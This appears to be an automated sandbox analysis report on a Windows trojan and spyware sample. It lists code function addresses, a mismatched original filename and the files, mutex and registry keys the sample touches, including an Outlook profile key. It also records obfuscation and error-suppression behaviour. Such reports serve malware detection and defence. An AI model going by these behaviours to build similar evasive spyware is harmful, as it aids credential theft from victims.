Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A718A6	0_2_02A718A6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A758A4	0_2_02A758A4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A748B7	0_2_02A748B7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C8BF	0_2_02A7C8BF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7188F	0_2_02A7188F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7208F	0_2_02A7208F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7D0E4	0_2_02A7D0E4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A720E3	0_2_02A720E3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A710F3	0_2_02A710F3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E0CB	0_2_02A7E0CB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E8D5	0_2_02A7E8D5
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A768DB	0_2_02A768DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7100E	0_2_02A7100E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E016	0_2_02A7E016
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71012	0_2_02A71012
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C818	0_2_02A7C818
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71071	0_2_02A71071
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71871	0_2_02A71871
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77078	0_2_02A77078
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76843	0_2_02A76843
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C054	0_2_02A7C054
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A719B1	0_2_02A719B1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7318B	0_2_02A7318B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74990	0_2_02A74990
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A771E7	0_2_02A771E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A789EE	0_2_02A789EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A761F4	0_2_02A761F4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74926	0_2_02A74926
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7312F	0_2_02A7312F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7093C	0_2_02A7093C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C93A	0_2_02A7C93A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71967	0_2_02A71967
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71165	0_2_02A71165
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76976	0_2_02A76976
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77143	0_2_02A77143
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7214F	0_2_02A7214F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A706A3	0_2_02A706A3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73EB3	0_2_02A73EB3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71E86	0_2_02A71E86
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7469F	0_2_02A7469F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A766F7	0_2_02A766F7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DED7	0_2_02A7DED7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70623	0_2_02A70623
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B629	0_2_02A7B629
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72E3F	0_2_02A72E3F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71E67	0_2_02A71E67
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BE63	0_2_02A7BE63
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B677	0_2_02A7B677
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74E7B	0_2_02A74E7B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76647	0_2_02A76647
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71644	0_2_02A71644
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70640	0_2_02A70640
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71654	0_2_02A71654
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DE54	0_2_02A7DE54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BFA7	0_2_02A7BFA7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C787	0_2_02A7C787
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A767EC	0_2_02A767EC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71FFB	0_2_02A71FFB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A747FB	0_2_02A747FB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CFF8	0_2_02A7CFF8
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A717C7	0_2_02A717C7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71F37	0_2_02A71F37
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BF3F	0_2_02A7BF3F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BF02	0_2_02A7BF02
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C70C	0_2_02A7C70C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7570B	0_2_02A7570B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75709	0_2_02A75709
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71717	0_2_02A71717
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76F1F	0_2_02A76F1F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73F6B	0_2_02A73F6B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7177A	0_2_02A7177A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74744	0_2_02A74744
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DF5F	0_2_02A7DF5F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78CA7	0_2_02A78CA7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73CA2	0_2_02A73CA2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CCAC	0_2_02A7CCAC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70CB2	0_2_02A70CB2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71CBE	0_2_02A71CBE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70497	0_2_02A70497
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC93	0_2_02A7DC93
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A764EB	0_2_02A764EB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CCF6	0_2_02A7CCF6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A784CF	0_2_02A784CF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DCCA	0_2_02A7DCCA
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A704D7	0_2_02A704D7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78423	0_2_02A78423
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74433	0_2_02A74433
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC33	0_2_02A7DC33
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76432	0_2_02A76432
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73C38	0_2_02A73C38
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CC0B	0_2_02A7CC0B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71C13	0_2_02A71C13
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71463	0_2_02A71463
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7546B	0_2_02A7546B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76C6A	0_2_02A76C6A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BC77	0_2_02A7BC77
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BC75	0_2_02A7BC75
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C448	0_2_02A7C448
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CC53	0_2_02A7CC53
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73C5D	0_2_02A73C5D
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72DA3	0_2_02A72DA3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CDA3	0_2_02A7CDA3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A735B8	0_2_02A735B8
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75D82	0_2_02A75D82
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76582	0_2_02A76582
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77597	0_2_02A77597
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71592	0_2_02A71592
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BD98	0_2_02A7BD98
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73DFF	0_2_02A73DFF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DDD3	0_2_02A7DDD3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A745DB	0_2_02A745DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72D30	0_2_02A72D30
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BD07	0_2_02A7BD07
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DD07	0_2_02A7DD07
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7450F	0_2_02A7450F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76D0F	0_2_02A76D0F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71D68	0_2_02A71D68
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7A576	0_2_02A7A576
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73D43	0_2_02A73D43
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70D4F	0_2_02A70D4F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DD4C	0_2_02A7DD4C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7455F	0_2_02A7455F

PE file contains strange resources

Source: 8rbuJ8Ycv1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8rbuJ8Ycv1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: 8rbuJ8Ycv1.exe, 00000000.00000002.886988620.0000000000435000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1729045404.0000000002550000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000000.886205140.0000000000435000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1729078192.00000000025A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe	Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe

Uses 32bit PE files

Source: 8rbuJ8Ycv1.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@570/3

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

File created: C:\Users\user\AppData\Local\Temp\~DF37E05158786A46FB.TMP

Jump to behavior

Source: 8rbuJ8Ycv1.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 8rbuJ8Ycv1.exe

ReversingLabs: Detection: 41%

Source: unknown	Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'	Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_00406636 push ebp; iretd	0_2_00406640
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DA75 push 00000051h; ret	0_2_02A7DA78
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7EB07 push ecx; retf	0_2_02A7EB08
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 16_2_0056EB07 push ecx; retf	16_2_0056EB08

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
